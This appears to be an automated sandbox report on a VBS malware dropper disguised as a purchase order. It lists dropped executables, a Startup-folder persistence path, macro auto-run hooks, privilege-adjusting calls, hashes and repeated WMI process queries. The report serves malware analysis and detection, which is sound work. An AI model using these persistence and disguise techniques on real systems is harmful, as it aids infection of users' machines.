                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A0A8F22_2_008A0A8F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00886BBC22_2_00886BBC
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008AAC8322_2_008AAC83
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089AD5C22_2_0089AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008B4EBF22_2_008B4EBF
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A0EC422_2_008A0EC4
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008E30AD22_2_008E30AD
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008B113E22_2_008B113E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A12F922_2_008A12F9
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008B542F22_2_008B542F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089368022_2_00893680
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008B599F22_2_008B599F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0088BDF022_2_0088BDF0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008ABDF622_2_008ABDF6
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00885D3222_2_00885D32
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A1E5A22_2_008A1E5A
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CBFB822_2_008CBFB8
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008B7FFD22_2_008B7FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008ADF6922_2_008ADF69
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0012DCD031_2_0012DCD0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0012A0C031_2_0012A0C0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0014018331_2_00140183
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016220C31_2_0016220C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0012853031_2_00128530
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0012667031_2_00126670
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0014067731_2_00140677
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018A8DC31_2_0018A8DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00140A8F31_2_00140A8F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00126BBC31_2_00126BBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0014AC8331_2_0014AC83
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013AD5C31_2_0013AD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00154EBF31_2_00154EBF
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00140EC431_2_00140EC4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001830AD31_2_001830AD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0015113E31_2_0015113E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001412F931_2_001412F9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0015542F31_2_0015542F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013368031_2_00133680
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0015599F31_2_0015599F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00125D3231_2_00125D32
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0012BDF031_2_0012BDF0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0014BDF631_2_0014BDF6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00141E5A31_2_00141E5A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0014DF6931_2_0014DF69
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016BFB831_2_0016BFB8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00157FFD31_2_00157FFD
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCXD42.tmp 634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\Synaptics.exe 7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe 7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00148AE8 appears 46 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00132570 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0014247B appears 36 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0014017E appears 45 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00125CD3 appears 48 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0012CAEE appears 48 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00141BC7 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0013C619 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00150650 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0013E3CC appears 41 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0013F885 appears 136 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00147750 appears 84 times
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 008A7750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 0089F885 appears 68 times
                                Source: Purchase Order Summary Details.vbsInitial sample: Strings found which are bigger than 50
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324
                                Source: JPS[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: JPS[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXD42.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.16.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ._cache_update.exe.14.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                                Source: XNLAGO.exe.15.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                                Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@26/77@14/5
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016D712 GetLastError,FormatMessageW,15_2_0016D712
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015B8B0 AdjustTokenPrivileges,CloseHandle,15_2_0015B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_0015BEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008BB8B0 AdjustTokenPrivileges,CloseHandle,22_2_008BB8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008BBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,22_2_008BBEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0015B8B0 AdjustTokenPrivileges,CloseHandle,31_2_0015B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0015BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,31_2_0015BEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,15_2_0016EA85
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,15_2_00166F5B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016EFCD CoInitialize,CoCreateInstance,CoUninitialize,15_2_0016EFCD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001231F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,15_2_001231F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7744
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbsJump to behavior
                                Source: Yara matchFile source: 0.3.wscript.exe.1941183d1b4.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1311247337.0000019410D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1308511468.000001941172A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXD42.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, type: DROPPED
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
